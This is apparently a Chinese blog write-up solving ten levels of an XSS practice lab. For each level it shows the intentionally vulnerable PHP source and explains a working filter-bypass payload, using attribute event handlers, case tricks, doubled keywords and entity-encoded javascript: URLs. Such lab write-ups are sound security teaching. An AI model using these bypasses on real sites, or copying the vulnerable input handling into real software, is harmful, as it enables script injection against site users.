xss闯关小练习(一)

忘记啥时候下载的练习题,无聊拿出来做做。
打开后随便点一下进入第一关:

第一关

image.png

源码:

<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

分析:没有做任何过滤
payload为:name=<script>alert(/xss/)</script>

第二关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>

分析:有两处输出,第一处在PHP代码块的echo中输出,第二处在表单input中输出,第一处用htmlspeciachars()做了转义,第二处并没有做限制,让payload在第二处起效果就好,有2种方法。
1.不逃逸input标签闭合前边的双引号加个事件触发xss即可:
移动下鼠标即可触发payload为: " onmouseover="alert(/xss/)
点击输入框即可触发payload为: " onclick="alert(/xss/)
点击输入框即可触发payload为: " onfocus="alert(/xss/)
2.逃逸出input标签执行另外的标签触发xss即可:
用<img>标签payload为: "><img src=! onerror="alert(/xss/)">
用<img>标签payload为:"><img src="javascript:alert(/xss/)"> //浏览器可能会过滤这个
用<a>标签payload为: "><a href="javascript:alert(/xss/)">xss</a>
用<a>标签payload为:<a href="" onmouseover="alert(/xss/)">xss</a> // 移动鼠标至框内
payload太多了,大同小异能用就行

第三关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>

分析:这次它将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让我使用单引号。
payload为:' onmouseover='alert(/xss/) //其他payload省略

第四关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

分析:这里的俩个输出点,一个被转义,另外一个将尖括号替换为空,但是这并不影响啊,按照上两题的套路,虽然不能闭合标签,单照样可以在input标签里边出发xss的。
payload为:" onfocus="alert(/xss/) //鼠标点击输入框出发,其他payload省略

第五关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

分析:貌似还是和前几题差不多只是将<script和on进行了替换但是黑名单过滤没用啊,两种方法都可触发xss,第一种可以直接跳出input标签换个其他标签即可第二种改变下大小写也可以,但是仔细看源代码发现有个strtolower()函数,他会把提交的所有字符转换为小写,那就跳出input标签即可。
payload为:"><a href="javascript:alert(/xss/)">xss</a>

第六关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

分析:代码中它还是进行了关键字过滤,但是没有了strtolow()函数,那么进行大小写绕过即可:
1.在input标签中触发XSS:
payload为:" ONmouseover="alert(/xss/) //等等...
2.跳出input标签触发XSS:
payload为:"><sCript>alert(/xss/)</sCript> //等等...

第七关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

分析:这道题出题人似乎把上边遇到的缺陷都补充了,但是程序有意的将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
1.在input标签中触发:
payload为:" oonnmouseover="alert(/xss/) //等等...
2.跳出input标签触发:
payload为:"><scscriptript>alert(/xss/)</scscriptript> //等等...

第八关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

分析:这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之鱼加了一个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
payload为:javascrip&#116;:alert(/xss/)

第九关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

分析:这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么可以向输入框加进去就可以绕过了。
payload为:javascrip&#116;:alert(/xss/)//http://

第十关:

image.png

源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

分析:这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者是onclick,需要将隐藏表单显示出来触发:
payload为:url后加 &t_sort=xss" onmouseover=alert(/xss/) type="text"
payload为:url后加 &t_sort=xss" onclick=alert(/xss/) type="text"

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • XSSer 升级之路
    之前积累了XSS 有一段时间,因为目前开始了一件有趣的工程,需要整合非常多的知识,其中Web 安全这一块出现最多的...
    刀背藏身阅读 13,111评论 0 16
  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 136,056评论 19 139
  • 2017年11月1日
    今天语文作业是写3,4,6,8,16的故事。我先讲一下各种类型的拼音有哪些:拼音z 、c 、s,它们都是平舌音;就...
    张轩赫阅读 2,999评论 2 6
  • 左右手
    左手是喧闹 看到时间在跑 人群逐渐在动 他们嬉戏打闹 右手是安静 感受空间变圆 一圈一圈的转 过去的人又来 左手在...
    说什么话不像说谎h阅读 1,643评论 0 0
  • 我们会犯错,也会成功。
    提姆.哈弗德在TED讲坛上有一则关于错误的精彩演讲。我并不熟悉这位美国人,却被他所表达的东西深深打动:错误是...
    三升石阅读 3,177评论 0 1

友情链接更多精彩内容